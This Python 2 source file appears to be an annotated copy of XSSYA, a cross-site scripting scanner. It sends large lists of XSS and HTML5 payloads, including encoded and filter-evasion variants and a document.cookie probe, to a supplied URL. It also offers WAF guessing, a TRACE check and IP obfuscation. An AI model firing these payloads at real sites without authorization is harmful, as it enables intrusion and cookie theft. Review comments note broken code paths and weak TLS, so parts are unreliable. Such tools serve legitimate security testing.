#!/usr/bin/env python | |
# -*- coding: cp1252 -*- | |
# XSSA is a Cross Site Scripting Scanner & Vulnerability Confirmation | |
# By Yehia Mamdouh - twitter.com/@Yehia1mamdouh / Facebook/yehia.mamdouh.98 | |
import urllib2 | |
from urllib2 import Request, build_opener, HTTPCookieProcessor, HTTPHandler | |
import urllib | |
from urllib import FancyURLopener | |
import cookielib | |
import socket | |
import time | |
import base64 | |
import re | |
import sys | |
import httplib | |
import colorama | |
import ssl | |
import gdshortener | |
from functools import partial | |
import custom | |
import string | |
from colorama import Fore, Back, Style | |
from colorama import init | |
colorama.init() | |
###Cross Site Scripting Payloads### | |
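import io

# Payloads come from dict.list in the working directory, one per line.
# The file is external to this script and every line is sent verbatim in
# requests to the target, so read it through before running a scan.
xss_attack=[]
# io.open is used because the Python 2 builtin open() rejects encoding=, and
# the rest of this script (print statements, urllib2) is Python 2 only.
with io.open("dict.list","r",encoding="utf-8") as file_paylods:
    for line in file_paylods:
        entry = line.rstrip("\r\n")
        # A blank line would be sent as an empty payload and counted in the
        # "Loaded" total.
        if entry:
            # Back to a UTF-8 byte string so it concatenates cleanly with the
            # byte-string URL read from raw_input().
            xss_attack.append(entry.encode("utf-8"))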
'''xss_attack = ["<script>alert('xssya')</script>", | |
"<script>alert(\"xssya\")</script>", | |
"1<ScRiPt>prompt(999691)</ScRiPt>", | |
"//1<ScRiPt>prompt(919397)</ScRiPt>", | |
"%22%3Cscript%3Ealert%28%27XSSYA%27%29%3C%2Fscript%3E", | |
"'\"</scRipt><scRipt>alert('xssya')</scRipt>", | |
"1%253CScRiPt%2520%253Eprompt%28962477%29%253C%2fsCripT%253E", | |
"<scRiPt>alert(1);</scrIPt>", | |
"\"><scRipt>alert('xssya')</scRipt>", | |
"'';!--\"<XSS>=&{()}", | |
"<q/oncut=alert(1)>", | |
"\";alert(1)//", | |
"%3CScRipt%3EALeRt(%27xssya%27)%3B%3C%2FsCRipT%3E", | |
"%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%27xss%27)%3C/scRipt%3E", | |
"<scr<script>ipt>alert(1)</scr<script>ipt>", | |
"javascript:alert(1)//", | |
"<scri%00pt>alert(1);</scri%00pt>", | |
"<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>", | |
"%3cscript%3ealert(%27XSSYA%27)%3c%2fscript%3e", | |
"<img src=\"x:alert\" onerror=\"eval(src%2b'(0)')\">", | |
"data:text/html,%3Cscript%3Ealert(0)%3C/script%3E", | |
"%3cbody%2fonhashchange%3dalert(1)%3e%3ca+href%3d%23%3eclickit", | |
"%3cimg+src%3dx+onerror%3dprompt(1)%3b%3e%0d%0a", | |
"%3cvideo+src%3dx+onerror%3dprompt(1)%3b%3e", | |
"<iframesrc=\"javascript:alert(2)\">", | |
"%22;alert%28%27XSS%29//", | |
"<IMG %22%22%22><SCRIPT>alert(%22XSS%22)</SCRIPT>%22>", | |
"<w contenteditable id=x onfocus=alert(1)>", | |
"<iframe/src=\"data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">", | |
"<form action=\"Javascript:alert(1)\"><input type=submit>", | |
"<isindex action=data:text/html, type=image>", | |
"<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=\">", | |
"<svg/onload=prompt(1);>", | |
"<marquee/onstart=confirm(2)>/", | |
"<body onload=prompt(1);>", | |
"<q/oncut=open()>", | |
"<a onmouseover=location=?javascript:alert(1)>click", | |
"<svg><script>alert(/1/)</script>", | |
"</script><script>alert(1)</script>", | |
"<scri%00pt>alert(1);</scri%00pt>", | |
"<scri%00pt>confirm(0);</scri%00pt>", | |
"5\x72\x74\x28\x30\x29\x3B'>rhainfosec", | |
"<isindex action=j	a	vas	c	r	ipt:alert(1) type=image>", | |
"<marquee/onstart=confirm(2)>", | |
"<A HREF=\"http://www.google.com./\">XSS</A>", | |
"<svg/onload=prompt(1);>"] | |
''' | |
### HTML5 Payloads ### | |
xss_html5 = ["<form id=\"test\"></form><button form=\"test\" formaction=\"javascript:alert(1)\">X</button>", | |
"<input onfocus=write(1) autofocus>", | |
"<input onblur=write(1) autofocus><input autofocus>", | |
"<video poster=javascript:alert(1)//></video>", | |
"<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>", | |
"<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>", | |
"<video><source onerror=\"alert(1)\">", | |
"<video onerror=\"alert(1)\"><source></source></video>", | |
"<form><button formaction=\"javascript:alert(1)\">X</button>", | |
"<body oninput=alert(1)><input autofocus>", | |
"<math href=\"javascript:alert(1)\">CLICKME</math>", | |
"<link rel=\"import\" href=\"test.svg\" />", | |
"<iframe srcdoc=\"<img src=x:x onerror=alert(1)>\" />", | |
"<picture><source srcset=\"x\"><img onerror=\"alert(1)\"></picture>", | |
"<picture><img srcset=\"x\" onerror=\"alert(1)\"></picture>", | |
"<img srcset=\",,,,,x\" onerror=\"alert(1)\">", | |
"<frameset onload=alert(1)>", | |
"<table background=\"javascript:alert(1)\"></table>", | |
"<!--<img src=\"--><img src=x onerror=alert(1)//\">", | |
"<comment><img src=\"</comment><img src=x onerror=alert(1)//\">", | |
"<style><img src=\"</style><img src=x onerror=alert(1)//\">", | |
"<li style=list-style:url() onerror=alert(1)></li>", | |
"<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>", | |
"<head><base href=\"javascript://\"/></head><body><a href=\"/. /,alert(1)//", | |
"<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></object>", | |
"<embed src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></embed>", | |
"<b <script>alert(1)//</script>0</script></b>", | |
"<div id=\"div1\"><input value=\"``onmouseover=alert(1)\"></div> <div id=\"div2\"></div>", | |
"<script>document.getElementById(\"div2\").innerHTML = document.getElementById(\"div1\").innerHTML;</script>", | |
"<img src=\"javascript:alert(2)\"> ", | |
"<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>", | |
"<iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>", | |
"<img src=\"x` `<script>alert(1)</script>\"` `>", | |
"<img src onerror /\" '\"= alt=alert(1)//\">", | |
"<title onpropertychange=alert(1)></title><title title=></title>", | |
"<!-- `<img/src=xx:xx onerror=alert(1)//--!>", | |
"<a style=\"-o-link:'javascript:alert(1)';-o-link-source:current\">X</a>", | |
"<style>@import \"data:,*%7bx:expression(write(1))%7D\";</style>", | |
"<// style=x:expression\28write(1)\29>", | |
"<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>", | |
"<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>", | |
"<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>", | |
"<script src=\"#\">{alert(1)}</script>;1", | |
"<b><script<b></b><alert(1)</script </b></b>"] | |
###User-Agent### | |
class MyOpener(FancyURLopener):
    # FancyURLopener sends this attribute as the User-Agent header, so every
    # request made through it claims to be an old Firefox on Windows XP.
    version = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11)Gecko/20071127 Firefox/2.0.0.11'
# Single shared opener used for the requests made further down in this script.
myopener = MyOpener()
class fake_ssl:
    # Stand-in for the ssl module as httplib sees it: the only attribute it
    # offers is wrap_socket, pre-bound to TLS 1.0.
    # NOTE(review): TLS 1.0 is a deprecated protocol version, and
    # ssl.wrap_socket is bound here without cert_reqs/ca_certs, whose default
    # is no certificate validation. Responses fetched over HTTPS can therefore
    # be altered in transit, which makes scan verdicts unreliable on untrusted
    # networks.
    wrap_socket = partial(ssl.wrap_socket, ssl_version=ssl.PROTOCOL_TLSv1)
# Rebinds the name "ssl" inside httplib for the whole process.
# NOTE(review): any other attribute httplib looks up on ssl is no longer
# there after this line -- presumably an AttributeError on interpreters whose
# httplib needs more than wrap_socket; confirm on the target Python version.
httplib.ssl = fake_ssl
class JSHTTPCookieProcessor(urllib2.BaseHandler):
    # Handler stub: it sets only its ordering value and defines no request or
    # response hooks. Nothing in the visible part of this script installs it.
    handler_order = 400
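#Function in case of Vulnerability Confirmation
def xxs2(exploi):
    """Request ``host + exploi`` once and print what the response suggests.

    Reads the module-level names ``host``, ``xi`` and ``myopener``. Prints the
    body length, a WAF guess based on the status code of this response, and a
    marker verdict. Returns nothing; I/O errors are reported and swallowed so
    that one failed request does not end the surrounding scan loop.
    """
    target = host + exploi
    print ""
    print Fore.RED + " Testing:",target
    try:
        if xi != 0:
            # NOTE(review): urllib2 exposes no ``Handler`` name and
            # build_opener() takes handler objects rather than a URL, so this
            # path fails as soon as it is entered. Only the undefined name
            # ``exploit`` was corrected; the intended proxy setup is not
            # visible here and needs confirming.
            handle = urllib2.Handler({'http': 'http://' + '/'})
            opene = urllib2.build_opener(target, handle)
            reply = opene.open(target)
        else:
            reply = myopener.open(target)
        sourc = reply.read()
        print " Source Length:",len(sourc)
        ##Detecting WAF if Exist
        # The status must come from the response to this payload. The start-up
        # response (res1) says nothing about how this request was handled, and
        # a blocked request would otherwise be reported as "Not Vulnerable".
        status = reply.getcode()
        if status == 406:
            print ""
            print " WAF Detected => (Mod_Security)"
        elif status == 999:
            print ""
            print " WAF Detected => WebKnight"
            time.sleep(5)
        elif status == 419:
            print ""
            print " WAF Detected => F5 BIG IP"
        else:
            print ""
            print " WAF Not Found"
            print ""
        # NOTE(review): this is a plain substring test for "xss" in the
        # lower-cased body. A page that reflects the payload safely encoded, or
        # merely mentions those letters, is reported as a hit, and a payload
        # without "xss" in it can never produce one. Treat a hit as a lead to
        # verify by hand, not as a finding.
        if re.search("xss", sourc.lower()) != None:
            print Fore.RED + "\n [!]XSS:",target,"\n"
        else:
            print""
            print Fore.GREEN + " [-] Not Vulnerable."
    # IOError is the base class of urllib2.HTTPError and is also what the
    # urllib opener raises for connection failures.
    except IOError, msg:
        print "[-] Error:",msg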
####### Print Menu and Exmaple ######## | |
print Fore.CYAN + "\n" | |
print "\t####################################################################################################" | |
print "\t# #" | |
print "\t# ___ ___ _______. _______.____ ____ ___ ____ ____ ___ ___ #" | |
print "\t# \ \ / / / | / |\ \ / / / \ \ \ / / |__ \ / _ \ #" | |
print "\t# \ V / | (----` | (----` \ \/ / / ^ \ \ \/ / ______ ) | | | | | #" | |
print "\t# > < \ \ \ \ \_ _/ / /_\ \ \ / |______/ / | | | | #" | |
print "\t# / . \ .----) | .----) | | | / _____ \ \ / / /_ __ | |_| | #" | |
print "\t# /__/ \__\ |_______/ |_______/ |__| /__/ \__\ \__/ |____| (__) \___/ #" | |
print "\t# #" #" | |
print "\t# XSSYA (Cross Site Scripting FrameWork) Coded by (@Yehia1mamdouh) Thanks (@Amr_Thabet) #" | |
print "\t# 7dd022053c8a35169305380371a4d577 #" | |
print "\t####################################################################################################" | |
print "" | |
print " XSSYA: Forget Browser And Alert Box " | |
print "" | |
# The target URL is taken from the operator as typed; no scheme or host check
# is applied before it is requested. urllib's openers treat a value without a
# scheme (or with file:) as a local file path, so a mistyped entry is opened
# from disk rather than rejected.
host = raw_input(" Enter A Vulnerable Link: ")
# Two baseline GETs to the same URL: res goes through the opener with the
# overridden User-Agent, res1 through urllib's default opener. res1 is kept
# only for its status code, which xxs2() reads.
res = myopener.open(host)
res1= urllib.urlopen(host)
html = res.read()
# Collects quoted absolute URLs from the page; the result is not used anywhere
# in the visible part of the script.
links = re.findall('"((http|href)s?://.*?)"', html)
print (30 * '-')
print (" XSSYA - M E N U")
print (30 * '-')
print (" 1. XSS Vulnerability Confirmation")
print (" 2. Custom XSS Payload")
print (" 3. HTML5 Payloads")
print (" 4. IP Convert")
print (" 5. CVE for XSS")
print (" 6. Cross Site Trace")
print ""
choice = raw_input(' Enter your choice [1-6] : ')
print ""
# Response headers of the first baseline request.
print res.info()
# Second read of a response whose body was already consumed into html above,
# so this returns only what is left (normally an empty string).
myfile = res.read()
print ""
#################### | |
# Looks at the last character of the target URL and prints a load message.
# NOTE(review): the nesting is reconstructed -- the listing had no indentation.
# sys.exit(1) is assumed to belong to the last branch, since at top level it
# would end the script before any scan could run.
if host[-1:] != "/":
    print""
    print Fore.CYAN + " Load XSSYA"
# Reached only when the URL ends in "/", in which case this test is always true.
elif host [-1:] != "=":
    print""
    print " Load "
# NOTE(review): unreachable -- the branch above already catches every URL that
# gets this far, so the exit never fires. If the intent was to reject URLs that
# do not end in "/", "=" or "?", the chain does not do that; confirm.
elif host [-1:] != "?":
    print""
    print " Load XSSYA"
    sys.exit(1)
### Testing the connection ###
# Sets the module-level xi from the third command-line argument; the request
# code elsewhere in this script branches on "xi != 0".
# NOTE(review): the nesting is reconstructed -- the listing had no indentation.
try:
    # With fewer than three arguments this lookup raises IndexError, which the
    # bare except below turns into xi = 0.
    # NOTE(review): an empty third argument skips the body without raising, so
    # xi is never bound and the later "xi != 0" tests would raise NameError.
    if sys.argv[3]:
        xi = sys.argv[3]
        print "Testing The Connection..."
        # httplib.ssl was rebound to the fake_ssl class earlier in this file,
        # so this call instantiates that class with one argument.
        # NOTE(review): fake_ssl defines no constructor and no connect(), so
        # this presumably raises and falls through to xi = 0 -- confirm.
        h2 = httplib.ssl(xi)
        h2.connect()
        print "[+] xi:",xi
except(socket.timeout):
    print "Connection Timed Out"
    xi = 0
    pass
# NOTE(review): a bare except also swallows KeyboardInterrupt and SystemExit
# and hides the real reason the check failed.
except:
    print ""
    xi = 0
    pass
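# Menu dispatch. Each test is a substring check on the answer, tried in the
# order 3, 2, 4, 5, 6; any other answer (including "1") runs the default scan
# at the bottom.
# NOTE(review): the nesting below is reconstructed from the if/elif/else and
# try/except keywords because the listing carried no indentation -- confirm
# against the upstream file.


def _fetch_source(url):
    """Return the body served for *url* through the opener selected by ``xi``."""
    if xi != 0:
        # NOTE(review): urllib2 exposes no ``Handler`` name and build_opener()
        # takes handler objects rather than a URL, so this path fails as soon
        # as it is entered. Kept as found; the intended proxy setup is not
        # visible here.
        handler = urllib2.Handler({'http': 'http://' + '/'})
        opener = urllib2.build_opener(url, handler)
        return opener.open(url).read()
    return myopener.open(url).read()


def _report_custom(url, typed_payload):
    """Fetch *url* and print the marker verdict, then the reflection verdict."""
    print url
    source = _fetch_source(url)
    print " Source Length:",len(source)
    # Plain substring test for "xss" in the lower-cased body: a page that
    # merely mentions those letters is reported as a hit.
    if re.search("xss", source.lower()) != None:
        print Fore.RED + "\n [!]XSS:",url,"\n"
    else:
        print ""
        print Fore.GREEN + " [-] Not Vulnerable."
    # Second request: looks for the payload exactly as typed, i.e. reflected
    # without any output encoding applied by the application.
    mam1 = myopener.open(url).read()
    if typed_payload in mam1:
        print ""
        print Fore.YELLOW + " [+] Confirmed Payload Found in Web Page Code"
        print ""
    else:
        print Fore.GREEN + " [-] False Positive"


def _menu_number(prompt):
    """Read a menu entry; return None when the answer is not an integer."""
    try:
        return int(raw_input(prompt))
    except ValueError:
        # Falls through to the "wrong choice" branch instead of a traceback.
        return None


#HTML5 Payloads#
if('3' in choice):
    settimes = raw_input(" Set Timeout: ")
    print " Scanning The Host:",host
    print ""
    print Fore.RED + " [+] Loaded:",len(xss_html5),"payloads\n"
    try:
        pause = int(settimes)
        for exploi in xss_html5:
            time.sleep(pause)
            xxs2(exploi.replace("\n",""))
    except KeyboardInterrupt:
        print ""
        print "Happy Hunting"
#Custom Payload Encode#
elif('2' in choice):
    z = raw_input(" Eenter a Payload: ")
    print ""
    payload = z
    print (" Custom Encode")
    print ""
    print (" 1. B64")
    print (" 2. Hex")
    print (" 3. URL_encode")
    print (" 4. HTML Entities")
    print (" 5. Hex With Semi Coloumns")
    print (" 6. Non Encode")
    print ""
    choose = _menu_number(" Choose your Encode ")
    #Encode Payload use of Base64#
    if choose == 1:
        print""
        print ' ################## B64 String #######################'
        print ''
        _report_custom(host + base64.standard_b64encode(payload), z)
    #Encdoe Payload use of HEX#
    elif choose == 2:
        print ""
        # Heading corrected: it was a copy of the URL-encode heading.
        print ' ################## Hex String #######################'
        print ''
        _report_custom(host + payload.encode('hex'), z)
    #Encode payload use of URLEncode#
    elif choose == 3:
        print""
        print ' ################## URL String #######################'
        print ''
        _report_custom(host + urllib2.quote(payload.encode("utf8")), z)
    #Encode with HexSemi()
    elif choose == 5:
        print""
        x = ''.join("&#x" + hex(ord(i))[2:] + ";" for i in payload)
        print x
        print ' ################## Hex With Semi #######################'
        print ''
        _report_custom(host + x, z)
    #Encode Payload use of HTML Entities#
    elif choose == 4:
        print ""
        print (" 1. Single & Double Quote")
        print (" 2. &")
        print (" 3. ()")
        print (" 4. all")
        print ""
        go = _menu_number(" Choose your Encode ")
        # NOTE(review): the listing showed these replacement strings already
        # decoded (which left several calls as no-ops and one line as an
        # unterminated string). The entity spellings below are reconstructed
        # from the menu labels -- confirm against the upstream file.
        entity_sets = {
            1: (("'", '&#39;'), ('"', '&quot;')),
            2: (('&', '&amp;'),),
            3: (("(", "&#40;"), (")", "&#41;")),
            4: (("<", "&lt;"), (">", "&gt;"), ("(", "&#40;"), (")", "&#41;"),
                ('"', '&quot;'), ("'", '&#39;')),
        }
        pairs = entity_sets.get(go)
        if pairs is None:
            print " Try Again"
        else:
            encoded = payload
            for plain, entity in pairs:
                encoded = encoded.replace(plain, entity)
            _report_custom(host + encoded, z)
    #NON Encode All#
    elif choose == 6:
        print ''
        _report_custom(host + payload, z)
    else:
        print " Worng choice"
#IP Convert#
elif('4' in choice):
    import binascii
    import socket, struct
    ip = raw_input(" Enter an IP ")
    print ""
    packed = socket.inet_aton(ip)
    nn = struct.unpack("!I", packed)[0]
    cc = binascii.hexlify(packed)
    dd = cc.upper()
    ip = ip.split('.')
    ff = '.'.join(('0x'+hex(int(i))[2:] for i in ip))
    ss = '%04o.%04o.%04o.%04o' % tuple(map(int, ip))
    print "###### Converted Addres ######"
    print ""
    print Fore.GREEN + " (Hex Lower) " + cc
    print ""
    print Fore.GREEN + " (Hex Upper) " + dd
    print ""
    print Fore.GREEN + " (HEX Addr) " + ff
    print ""
    print Fore.RED + " (Dword Addr) ", nn
    print ""
    print Fore.BLUE + " (Octal Addr)", ss
    sys.exit()
### XSS CVE ###
elif('5' in choice):
    # Project-local module; the three names called below come from it.
    from cve import *
    print (" 1. Apache")
    print (" 2. WordPress")
    print (" 3. PHPmyAdmin")
    print ""
    Product = raw_input("Select CVE")
    print ""
    if ('1' in Product):
        print Apache()
        sys.exit()
    elif('2' in Product):
        # NOTE(review): spelled "WordPess" here; presumably it matches the
        # name defined in cve -- confirm.
        print WordPess()
        sys.exit()
    elif('3' in Product):
        print PHPmyAdmin()
        sys.exit()
    else:
        print "Try Again"
###Checking Cross Site Trace (XST)###
elif('6' in choice):
    try:
        print Fore.RED + " Checking XST...."
        request = urllib2.Request(host)
        request.get_method = lambda: 'TRACE'
        response = urllib2.urlopen(request)
        payload = response.read()
        print(payload)
        # A server that honours TRACE echoes the request back as the body. A
        # success status alone is not evidence: an error page or a rewritten
        # request served with 200 would otherwise be reported as vulnerable.
        if payload.lstrip().upper().startswith("TRACE "):
            print "Host is Vulnerable "
        else:
            print "[-] Not Vulnerable (XST) ","TRACE request not echoed"
    except(urllib2.HTTPError), msg:
        print "[-] Not Vulnerable (XST) ",msg
### Print the result in case of Vulnerable Link Confirmation###
else:
    settimes = raw_input(" Set Timeout: ")
    print " Scanning The Host:",host
    print ""
    print Fore.RED + " [+] Loaded:",len(xss_attack),"payloads\n"
    try:
        pause = int(settimes)
        for exploi in xss_attack:
            time.sleep(pause)
            # Strip the line ending once, so the confirmation request below
            # asks for exactly the URL that xxs2() tested.
            probe = exploi.replace("\n","")
            xxs2(probe)
            ###Confirm by Searching Payload in Web Page###
            heer = custom.check()
            bb = " [+] Confirmed Payload Found in Web Page Code"
            cc = " [-] False Positive"
            try:
                mam = myopener.open(host+probe).read()
                found = any(hit in mam for hit in heer.hit)
                if found:
                    print ""
                    print Fore.YELLOW + bb
                    # NOTE(review): this hands the target URL together with the
                    # confirmed payload to a third-party shortening service
                    # (gdshortener is an is.gd client), which discloses the
                    # finding outside the engagement. Consider making it opt-in.
                    s = gdshortener.ISGDShortener()
                    short = s.shorten(host+probe)[0]
                    print ""
                    print Fore.GREEN+ " URL Shortener is", short
                    print ""
                    #Getting COKKIES
                    # No script runs here: the jar only collects cookies that
                    # the server sets in its response headers for this request.
                    cj = cookielib.CookieJar()
                    opener = build_opener(HTTPCookieProcessor(cj), HTTPHandler())
                    xss_cookie = "%3cscript%3ealert(document.cookie)%3c/script%3e"
                    url1 = (host+xss_cookie)
                    req = Request(url1, headers={'User-Agent' : "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30"})
                    f = opener.open(req)
                    html = f.read()
                    print " Excute document.cookie"
                    time.sleep (3)
                    print ""
                    for cookie in cj:
                        print Fore.CYAN + " ==>", cookie
                else:
                    print ""
                    print Fore.GREEN + cc
            except urllib2.HTTPError:
                print "Error"
    except KeyboardInterrupt:
        print ""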
### Save the page for manual review ###
# Two copies go to fixed file names in the working directory: the page as
# served, and the page requested with an <h1> marker appended to the URL.
print ""
print ""
save_answer = raw_input(" Save Page CODE:? ")
if 'y' in save_answer:
    for source_url, out_path in (
            (host, './scan_js.txt'),
            (host + '"><h1>r7hf72hds882js88d2</h1> ', './scan_html.txt')):
        urllib.urlretrieve(source_url, out_path)

### Print the page on screen ###
print ""
show_answer = raw_input(" Print HTML CODE:? ")
if 'y' not in show_answer:
    print ""
    print Fore.CYAN + " Happy Hunting"
else:
    page = urllib2.urlopen(host)
    print page.info()
    body = page.read()
    print ""
    print Fore.WHITE + body
Rewrote xssya to load its payloads from a dictionary file 😄
dict.list must be downloaded into the same directory as xssya.py.
xssya : https://github.com/yehia-mamdouh/XSSYA-V-2.0
dict.list : https://gist.github.com/tennc/4026cfd0925aaad0a655